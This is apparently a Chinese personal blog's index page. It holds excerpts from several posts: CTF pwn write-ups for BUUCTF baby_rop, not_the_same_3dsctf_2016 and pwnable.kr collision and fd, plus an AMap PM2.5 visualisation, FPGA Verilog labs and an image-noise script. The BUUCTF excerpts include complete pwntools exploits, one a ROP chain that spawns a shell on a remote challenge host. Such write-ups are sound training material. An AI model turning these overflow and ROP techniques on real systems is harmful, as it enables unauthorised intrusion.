![BUUCTF-PWN-[HarekazeCTF2019]baby_rop](https://cdn.jsdelivr.net/gh/Chaos-xBug/img/blog/202112061943497.png)
BUUCTF-PWN-[HarekazeCTF2019]baby_rop
BUUCTF-PWN-[HarekazeCTF2019]baby_ropchecksec
IDA
scanf可以溢出
查看string
发现binsh
思路先覆盖变量v4,溢出到rdi,然后带上binsh参数调用system函数
EXP12345678910111213from pwn import *p = remote('node4.buuoj.cn', 25780)rdi = 0x400683binsh_addr = 0x601048sys_addr = 0x400490payload = flat(b'a' * (0x10 + 8), p64(rdi), p64(binsh_addr), p64(sys_addr))p.sendline(payload)p.interactive()
结果注意:这题的flag在home下的文件夹babyrop里面
BUUCTF-PWN-not_the_same_3dsctf_2016
BUUCTF-PWN-not_the_same_3dsctf_2016checksec
IDA
main函数中的gets函数可以溢出
这个函数读取了flag,并存入到变量fl4g中,且其在bss段,如下图:
那么我们只需要使get_secret()函数运行,然后再利用write函数将flag写出就行了
EXP12345678910111213from pwn import *p = remote('node4.buuoj.cn', 29733)elf = ELF('./nts32')write = elf.sym['write']bss_fl4g = 0x080eca2dpayload = b'a' * (0x2d) + p32(0x080489A0) + p32(write) + p32(bss_fl4g) + p32(1) + p32(bss_fl4g) + p32(45)p.sendline(payload)p.interactive()
结果
基于高德地图API可视化PM2.5指数
基于高德地图API可视化PM2.5指数
帮憨憨室友做创新实践作业
用JavaScript不一定要学JavaScript系列
文末有完整源码和数据集的链接
获取高德地图API请自行百度
编写head12345678910111213141516<head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>2018年12月1日-PM2.5情况</title> <style> html, body, #container { margin: 0; ...
PWNABLE-collision
PWNABLE-collision题目信息
源码分析12345678910111213141516171819202122232425262728293031#include <stdio.h>#include <string.h>unsigned long hashcode = 0x21DD09EC;unsigned long check_password(const char* p){ int* ip = (int*)p; int i; int res=0; for(i=0; i<5; i++){ res += ip[i]; } return res;}int main(int argc, char* argv[]){ if(argc<2){ printf("usage : %s [passcode]\n", a ...
PWNABLE-fd
PWNABLE-fd这道题比较简单,但我还是从里面学到了一些我不清晰的C语言知识
题目信息
ssh连接根据题目信息给的连接方式(ssh)连接到目标机器
1ssh fd@pwnable.kr -p2222
查看目录文件
不出所料,flag读取文件的权限果然是没有的
查看fd.c文件
分析代码
argc:参数个数
argv[]:参数数组
envp[]:环境参数数组
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
只要大于一个参数就可以绕过这个if语句
atoi函数:将字符串转化为int型
read函数:ssize_t read(int fd, void * buf, size_t count);
fd为文件指针,但有以下几种特例:
fd == 0:从标准输入读取
fd == 1:从标准输出读取
fd == 2:从标准错误输出读取
buf为读取内容的存放空间
count为读入字节数
...
边沿J-K触发器设计实验
边沿J-K触发器设计实验实验要求基于FPGA设计一个边沿J-K触发器集成模块74LS76
实验步骤
具体实验单个JK触发器模块123456789101112131415161718`timescale 1ns / 1psmodule test(J, K, CP, Sd, Rd, Q, FQ); input J, K, CP, Sd, Rd; output Q, FQ; reg Q; wire D; assign D = J * FQ + ~K * Q; always @(negedge CP or negedge Sd or negedge Rd) begin if(Sd == 0) Q <= 1'b1; else if(Rd == 0) Q <= 1'b0; else Q <= D; end assign FQ = ~Q;endmodule
74LS76模块123456789101112`timescale 1ns / 1psmodule EdgeJKF ...
多路数据选择器设计实验
多路数据选择器设计实验实验源码及工程文件:https://github.com/Chaos-xBug/selector_4-1
实验内容
具体实验选择xc7a100tlcsg324-2L板卡型号
数据选择器模块12345678910111213141516171819202122232425`timescale 1ns / 1psmodule selector(A, B, C, D, EN, S, Y); parameter size = 4; input [size-1:0]A; input [size-1:0]B; input [size-1:0]C; input [size-1:0]D; input EN; input [1:0]S; output reg [size-1:0]Y; always @(A, B, C, D, EN, S) begin if(EN == 0) begin case(S) 2'b00: Y = A; 2 ...
图像处理20211117
讨论纪要
设多尺度指数为k(k = 1, 2, 3……)
遍历图像(每次都取3*3的九宫格为研究单位)
统计每个单位内存在噪声的个数的分布情况
图片素材原图:
噪声图(20%噪声):
测试代码123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102# python3.8# utf-8# 统计噪声分布情况import cv2 as cvimport numpy as npdef shrink(channel, k): """ :param channel: 像素通道 :param k: 多尺度指数 :return: 小矩阵 """ if k == 1: ...
